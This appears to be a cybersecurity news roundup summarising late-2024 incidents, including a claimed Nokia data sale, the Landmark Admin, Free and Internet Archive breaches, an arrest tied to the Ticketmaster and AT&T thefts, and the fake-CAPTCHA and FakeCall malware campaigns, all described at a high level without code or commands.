Nokia's Internal Data is sold for $20,000 Following Breach via Contractor
Threat actors claim they accessed Nokia’s internal data by breaching a third-party contractor, obtaining SSH keys, source code, and internal credentials. They are allegedly selling the data for $20,000 on BreachForums, with no customer data reportedly affected. The attackers assert they acquired sensitive internal data without accessing customer information.
According to threat actor’s post, the compromised data includes SSH keys, source code, RSA keys, Bitbucket logins, SMTP accounts, webhooks, and hardcoded credentials—details that could enable unauthorized access to Nokia's internal systems and aid in other cyber attacks. To substantiate the claim, attacker shared a file tree, showing files and folders linked to Nokia's operations.
The threat actor accessed this data through a contractor working with Nokia, a tactic increasingly common as companies grant contractors extensive access to their systems. Experts have warned about this risk, urging companies to extend security standards to all third-party partners.
While no customer data was breached, access to Nokia’s internal environment could lead to significant security implications, allowing attackers to alter Nokia’s services or exploit vulnerabilities to target other systems.
Nokia is reportedly aware of the claims and is investigating, stating, "To date, our investigation has found no evidence that any of our systems or data are impacted."
The threat actor: Intel Broker is a prominent figure on Breach Forums, has a record of high-profile data breaches, having previously claimed to breach Apple and AMD, exposing sensitive internal tools and employee information.
Data Breach at Texas-Based Insurance Service Provider Affects 800,000 Individuals
A significant data breach at Landmark Admin, a Texas insurance administrative services provider, may impact over 800,000 individuals nationwide, including nearly 68,000 Texans, according to recent filings. The breach, which occurred on May 13, potentially exposed a range of sensitive data, including names, addresses, Social Security numbers, ID numbers, financial information such as credit or debit card numbers, and medical and health insurance details. Both the Texas and Maine Attorneys General were notified of the incident, and Landmark informed affected consumers on October 23.
Upon discovering the breach, Landmark promptly disconnected the compromised systems and revoked remote access to its network. The company then enlisted a specialized third-party cybersecurity firm to secure its systems and conduct a comprehensive forensic investigation to ascertain the nature and scope of the incident. However, during the investigation, the unauthorized actor re-accessed Landmark’s environment on June 17, 2024. The investigation was completed on or about July 24, 2024.
Landmark Admin, a third-party administrator for insurance carriers including Dallas-based Liberty Bankers Insurance Group, is offering impacted individuals credit monitoring and identity theft protection services, along with a $1 million insurance reimbursement policy and identity theft recovery services. Landmark also noted that the compromised personal information includes details of individuals connected to insurance policies administered by the company, such as policyholders, beneficiaries, or payors.
Italian Politicians Sound Alarm Following Breach Impacting 800,000 Citizens
Italian politicians have voiced alarm after revelations of a significant data breach potentially affecting the sensitive information of 800,000 citizens. Prosecutors in Milan disclosed that a private investigative agency had been gathering dossiers on high-profile Italian business and political figures, using data breaches involving law enforcement, tax authorities, and other sensitive public records. The breaches reportedly date back to 2022, though authorities are still determining which individuals and officials were specifically targeted.
Italian Foreign Minister Antonio Tajani condemned the breach, calling it “a threat to democracy,” while the Democratic Party, the opposition, demanded that Premier Giorgia Meloni address parliament regarding measures to protect citizens' data. Four individuals are currently under house arrest, including Carmine Gallo, a former law enforcement official who is believed to be the head of the investigative agency responsible for the breach, as well as the alleged lead hacker. Twenty other individuals, including prominent business figures, are under investigation in the case announced last Saturday.
French ISP Free Discloses Cyberattack Impacting 19 Million Accounts
French telecommunications provider Free, the nation’s second-largest Internet service provider, recently confirmed a cyberattack that exposed data on more than 19 million subscribers. Hackers allegedly put this information up for sale on a cybercrime forum. The threat actor, identified as "drussellx," advertised two databases stolen from the ISP on the Dark Web, claiming they contained information on over 19 million customer accounts, including more than 5 million international bank account details.
Free disclosed the breach to Agence France-Presse on October 26, reporting that “unauthorized access” was gained to some personal data associated with certain subscriber accounts. However, Free emphasized that no passwords, bank-card information, emails, SMS messages, or voicemails were compromised, and that customer services remained unaffected. As part of its response, Free will be notifying affected customers and has filed a criminal complaint with French authorities, including the National Commission for Information Technology and Civil Liberties (CNIL) and the National Agency for the Security of Information Systems (ANSSI).
Internet Archive Hack Exposes 31 Million Users’ Information
The Internet Archive, a nonprofit dedicated to providing universal access to knowledge, suffered a major breach, exposing the information of over 31 million users. The attack prompted a temporary shutdown of services, with the organization confirming that identifying information such as emails and hashed passwords had been compromised. The nonprofit, which operates with limited resources, assured users that its extensive digital library and archive collections remain secure.
News of the attack surfaced on October 9, with users sharing screenshots indicating that the website’s JavaScript had been defaced. This breach follows a similar incident in May, which was the Internet Archive’s first cyberattack since its founding in 1996.
Royal Canadian Mounted Police Arrest Threat Actor Linked to Ticketmaster and AT&T Breaches
The Royal Canadian Mounted Police recently apprehended Alexander Connor Moucka, known online as Judische and Waifu, in connection with multiple data breaches, including those impacting Ticketmaster and AT&T. Moucka is suspected of compromising over 100 accounts by using infostealer malware to access credentials. He is alleged to have stolen data from major clients, including Ticketmaster, which alone impacted over 500 million individuals.
Though Snowflake’s systems were not directly breached, the attack exploited the lack of multi-factor authentication on many customer accounts, enabling attackers to gain access with a single password. Mandiant, a cybersecurity firm, attributed the attack to the threat actor UNC5537, known for financially motivated cyber operations.
Malware Campaign Utilizes Fake CAPTCHAs to Spread Infection
A recent malware campaign has been observed using fake CAPTCHA verifications to deceive users and install malware. The attackers rely on users’ instinct to quickly bypass CAPTCHA tests, particularly on websites hosting online ads, adult content, file-sharing services, betting platforms, and anime sites.
The primary malware being deployed is Lumma, alongside Amadey, which redirects users to a seemingly genuine CAPTCHA test. Clicking “I’m not a robot” executes malicious code, which then downloads malware that searches for cryptocurrency wallets and extracts valuable data from browsers.
While Lumma has been used in similar campaigns before, Amadey represents a new addition. It has capabilities to steal data from popular browsers, identify and replace cryptocurrency wallet addresses, and even install the Remcos remote access tool, granting attackers full control over infected systems.
FakeCall Malware Enhances Capabilities to Intercept Calls to Banks
A new version of FakeCall, an Android financial fraud Trojan, has emerged with enhanced features to intercept customer-support calls to banks. Initially discovered in 2022, this malware goes beyond typical banking Trojans by rerouting calls intended for bank support to numbers controlled by attackers.
FakeCall’s ability to simulate incoming calls from bank representatives provides a false sense of security, persuading victims to share sensitive information. The malware gains access when users set it as the default call handler on their Android device, enabling it to redirect calls and overlay its own screen on legitimate calls.
The Trojan utilizes Android’s Accessibility Service, allowing attackers to capture information displayed on users' screens. Its use of obfuscated code further conceals malicious activities, making detection challenging for unsuspecting users.
